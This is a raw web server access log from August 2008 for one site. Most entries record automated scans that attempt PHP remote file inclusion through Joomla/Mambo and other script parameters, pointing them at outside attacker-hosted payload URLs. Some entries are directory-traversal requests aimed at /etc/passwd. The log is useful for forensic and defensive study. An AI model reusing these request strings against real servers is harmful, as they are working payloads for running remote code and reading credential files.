69.94.70.15 - - [24/Aug/2008:09:20:14 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.teamprobes.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.87.154.41 - - [24/Aug/2008:09:20:14 -0700] "GET /logs//werbungFrame.php?do=http://www.geocities.com/check.port/soucer/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
70.84.182.98 - - [24/Aug/2008:09:20:17 -0700] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://poko.club.hu/id1.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [24/Aug/2008:09:20:18 -0700] "GET //index.php?DOCUMENT_ROOT=http://poko.club.hu/id1.txt???? HTTP/1.1" 200 9875 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [24/Aug/2008:09:20:18 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://poko.club.hu/id1.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [24/Aug/2008:09:20:18 -0700] "GET /logs/access_080723.log/errors.php?error=http://poko.club.hu/id1.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [24/Aug/2008:09:20:18 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [24/Aug/2008:09:20:18 -0700] "GET /logs/errors.php?error=http://poko.club.hu/id1.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.91.99.14 - - [24/Aug/2008:09:20:29 -0700] "GET /logs/access_080620.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://pa-lavvenireprato.it/administrator/components/com_remository/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.91.99.14 - - [24/Aug/2008:09:20:29 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://pa-lavvenireprato.it/administrator/components/com_remository/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.91.99.14 - - [24/Aug/2008:09:20:29 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://pa-lavvenireprato.it/administrator/components/com_remository/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.182.98 - - [24/Aug/2008:09:20:41 -0700] "GET /logs/access_080722.log/errors.php?error=http://poko.club.hu/id1.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [24/Aug/2008:09:20:41 -0700] "GET /logs/access_080722.log//index.php?DOCUMENT_ROOT=http://poko.club.hu/id1.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.29.218 - - [24/Aug/2008:09:20:49 -0700] "GET /logs//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 62004 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.8.100 - - [24/Aug/2008:09:20:49 -0700] "GET /presto/?M=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.18.29.218 - - [24/Aug/2008:09:20:50 -0700] "GET /logs//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 62004 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [24/Aug/2008:09:20:50 -0700] "GET //?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 9939 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [24/Aug/2008:09:20:51 -0700] "GET /logs//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 62004 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [24/Aug/2008:09:20:51 -0700] "GET //?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 9939 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [24/Aug/2008:09:20:53 -0700] "GET //?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 9939 "-" "libwww-perl/5.805" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:09:21:07 -0700] "GET /logs/access_080510.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:09:21:09 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 200 9983 "-" "libwww-perl/5.805" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:09:21:10 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.9.63.18 - - [24/Aug/2008:09:21:21 -0700] "GET /logs/access_080312.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.hladogen.ru/project_files/memei.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.75.56.186 - - [24/Aug/2008:09:21:24 -0700] "GET /logs/access_080211.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://suport08.freehostia.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:09:21:26 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.40.56.32 - - [24/Aug/2008:09:21:27 -0700] "GET /logs/access_080413.log/index2.php?page=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.40.56.32 - - [24/Aug/2008:09:21:27 -0700] "GET /index2.php?page=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.40.56.32 - - [24/Aug/2008:09:21:27 -0700] "GET /logs/index2.php?page=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:09:21:27 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 200 9980 "-" "libwww-perl/5.79" "www.dmulk.com"
81.9.63.18 - - [24/Aug/2008:09:21:35 -0700] "GET /logs/access_080114.log//modules/My_eGallery/index.php?basepath=http://www.hladogen.ru/project_files/memei.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.111.176.9 - - [24/Aug/2008:09:21:56 -0700] "GET /logs//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 62004 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.9 - - [24/Aug/2008:09:21:58 -0700] "GET //?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 9939 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.182.98 - - [24/Aug/2008:09:22:06 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
70.84.182.98 - - [24/Aug/2008:09:22:07 -0700] "GET //index.php?DOCUMENT_ROOT=http://superspeedlearning.com/test.txt? HTTP/1.1" 200 9877 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
66.40.56.32 - - [24/Aug/2008:09:22:07 -0700] "GET /logs/access_080630.log/index2.php?page=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.75.56.186 - - [24/Aug/2008:09:22:09 -0700] "GET /logs/access_080103.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://suport08.freehostia.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:09:22:19 -0700] "GET /logs/access_080404.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:22:47 -0700] "GET /logs/access_080723.log/errors.php?error=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:22:48 -0700] "GET /errors.php?error=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:22:48 -0700] "GET /logs/errors.php?error=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:22:51 -0700] "GET /logs/access_080723.log/errors.php?error=http://spiritualcultivation.com/modules/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:22:52 -0700] "GET /errors.php?error=http://spiritualcultivation.com/modules/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:22:52 -0700] "GET /logs/errors.php?error=http://spiritualcultivation.com/modules/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.87.154.41 - - [24/Aug/2008:09:23:00 -0700] "GET /logs/access_080426.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.geocities.com/check.port/soucer/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
62.87.154.41 - - [24/Aug/2008:09:23:07 -0700] "GET /logs/access_080313.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.geocities.com/check.port/soucer/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:23:08 -0700] "GET /logs/access_080723.log/errors.php?error=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:23:08 -0700] "GET /errors.php?error=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:23:08 -0700] "GET /logs/errors.php?error=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
81.9.63.18 - - [24/Aug/2008:09:23:25 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.hladogen.ru/project_files/memei.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.9.63.18 - - [24/Aug/2008:09:23:26 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.hladogen.ru/project_files/memei.jpg? HTTP/1.1" 200 9976 "-" "libwww-perl/5.811" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:23:29 -0700] "GET /logs/access_080722.log/errors.php?error=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
216.180.241.37 - - [24/Aug/2008:09:23:35 -0700] "GET /logs/access_080224.log/index.php?p=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.149.232.117 - - [24/Aug/2008:09:23:37 -0700] "GET /logs/access_080309.log/index3.php?ref=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.149.232.117 - - [24/Aug/2008:09:23:37 -0700] "GET /index3.php?ref=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.149.232.117 - - [24/Aug/2008:09:23:37 -0700] "GET /logs/index3.php?ref=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:23:39 -0700] "GET /logs/access_080722.log/errors.php?error=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:23:39 -0700] "GET /logs/access_080722.log/errors.php?error=http://spiritualcultivation.com/modules/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
151.64.167.56 - - [24/Aug/2008:09:23:50 -0700] "GET /logs/access_080711.log//tools/send_reminders.php?noSet=0&includedir=http://arabhack.fateback.com/kngid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.64.167.56 - - [24/Aug/2008:09:23:51 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://arabhack.fateback.com/kngid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:09:23:52 -0700] "GET /logs/access_080723.log/errors.php?error=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:09:23:53 -0700] "GET /errors.php?error=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:09:23:53 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:09:23:54 -0700] "GET /logs/errors.php?error=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:09:23:54 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 200 9983 "-" "libwww-perl/5.79" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:09:24:03 -0700] "GET /logs/access_080723.log/errors.php?error=http://spiritualcultivation.com/modules/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.64.167.56 - - [24/Aug/2008:09:24:03 -0700] "GET /logs/access_080530.log//tools/send_reminders.php?noSet=0&includedir=http://arabhack.fateback.com/kngid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:09:24:03 -0700] "GET /errors.php?error=http://spiritualcultivation.com/modules/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:09:24:04 -0700] "GET /logs/errors.php?error=http://spiritualcultivation.com/modules/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.8.100 - - [24/Aug/2008:09:24:36 -0700] "GET /logs/access_070715.log HTTP/1.0" 200 115427 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:09:24:43 -0700] "GET /logs/access_080722.log/errors.php?error=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:09:24:45 -0700] "GET /logs/access_080722.log/errors.php?error=http://spiritualcultivation.com/modules/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.64.167.56 - - [24/Aug/2008:09:24:50 -0700] "GET /logs/access_080711.log//tools/send_reminders.php?noSet=0&includedir=http://arabhack.fateback.com/kngid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.64.167.56 - - [24/Aug/2008:09:24:56 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://arabhack.fateback.com/kngid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.64.167.56 - - [24/Aug/2008:09:24:56 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://arabhack.fateback.com/kngid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:24:57 -0700] "GET /logs/access_080723.log/errors.php?error=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
62.87.154.41 - - [24/Aug/2008:09:24:57 -0700] "GET /logs/access_080209.log//werbungFrame.php?do=http://www.geocities.com/check.port/soucer/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:24:59 -0700] "GET /logs/errors.php?error=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:24:59 -0700] "GET /errors.php?error=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
151.64.167.56 - - [24/Aug/2008:09:25:07 -0700] "GET /logs/access_080530.log//tools/send_reminders.php?noSet=0&includedir=http://arabhack.fateback.com/kngid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.67.23.3 - - [24/Aug/2008:09:25:11 -0700] "GET /logs/access_080210.log/toplist.php?f=toplist_top10&phpbb_root_path=http://sunshineaviation.com/osticket/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.23.3 - - [24/Aug/2008:09:25:11 -0700] "GET /toplist.php?f=toplist_top10&phpbb_root_path=http://sunshineaviation.com/osticket/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.23.3 - - [24/Aug/2008:09:25:11 -0700] "GET /logs/toplist.php?f=toplist_top10&phpbb_root_path=http://sunshineaviation.com/osticket/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:25:12 -0700] "GET /logs/access_080722.log/errors.php?error=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:09:25:26 -0700] "GET /errors.php?error=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:09:25:26 -0700] "GET /logs/errors.php?error=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:09:25:27 -0700] "GET /logs/access_080723.log/errors.php?error=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
80.67.23.3 - - [24/Aug/2008:09:25:29 -0700] "GET /logs/access_080426.log/toplist.php?f=toplist_top10&phpbb_root_path=http://sunshineaviation.com/osticket/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.40.56.32 - - [24/Aug/2008:09:25:30 -0700] "GET /logs/access_080601.log%20/index2.php?page=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:09:25:33 -0700] "GET /logs/access_080722.log/errors.php?error=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
69.64.34.172 - - [24/Aug/2008:09:25:59 -0700] "GET /logs/access_080403.log/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://masprast.700megs.com/bot/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.34.172 - - [24/Aug/2008:09:26:00 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://masprast.700megs.com/bot/id.txt??? HTTP/1.1" 200 9952 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.34.172 - - [24/Aug/2008:09:26:00 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://masprast.700megs.com/bot/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.187.94.181 - - [24/Aug/2008:09:26:11 -0700] "GET /logs/scripts.log//ws/index.php?includedir=http://mabat.edumining.info/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.187.94.181 - - [24/Aug/2008:09:26:11 -0700] "GET //ws/index.php?includedir=http://mabat.edumining.info/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.187.94.181 - - [24/Aug/2008:09:26:11 -0700] "GET /logs//ws/index.php?includedir=http://mabat.edumining.info/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.67.23.3 - - [24/Aug/2008:09:26:19 -0700] "GET /logs/access_080426.log%20/toplist.php?f=toplist_top10&phpbb_root_path=http://sunshineaviation.com/osticket/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
198.66.222.121 - - [24/Aug/2008:09:26:28 -0700] "GET /logs/access_080306.log//admin/classes/errors.php?error=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
198.66.222.121 - - [24/Aug/2008:09:26:28 -0700] "GET //admin/classes/errors.php?error=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
198.66.222.121 - - [24/Aug/2008:09:26:28 -0700] "GET /logs//admin/classes/errors.php?error=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.113.53.6 - - [24/Aug/2008:09:26:39 -0700] "GET /logs/access_071212.log//admin/spaw/spaw_control.class.php?spaw_root=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.113.53.6 - - [24/Aug/2008:09:26:40 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.113.53.6 - - [24/Aug/2008:09:26:40 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
198.66.222.121 - - [24/Aug/2008:09:26:42 -0700] "GET /logs/access_080504.log//admin/classes/errors.php?error=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.9.63.18 - - [24/Aug/2008:09:26:50 -0700] "GET /logs/access_080401.log//skin/zero_vote/ask_password.php?dir=http://www.hladogen.ru/project_files/memei.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.113.53.6 - - [24/Aug/2008:09:26:50 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.9.63.18 - - [24/Aug/2008:09:26:50 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.hladogen.ru/project_files/memei.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.9.63.18 - - [24/Aug/2008:09:26:51 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.hladogen.ru/project_files/memei.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.64.34.172 - - [24/Aug/2008:09:26:59 -0700] "GET /logs/access_080403.log/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://masprast.700megs.com/bot/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.34.172 - - [24/Aug/2008:09:27:01 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://masprast.700megs.com/bot/id.txt??? HTTP/1.1" 200 9952 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.34.172 - - [24/Aug/2008:09:27:01 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://masprast.700megs.com/bot/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.113.53.6 - - [24/Aug/2008:09:27:09 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.56.32 - - [24/Aug/2008:09:27:12 -0700] "GET /logs/access_080722.log/index2.php?page=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.113.53.6 - - [24/Aug/2008:09:27:22 -0700] "GET /logs/access_071218.log//admin/spaw/spaw_control.class.php?spaw_root=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
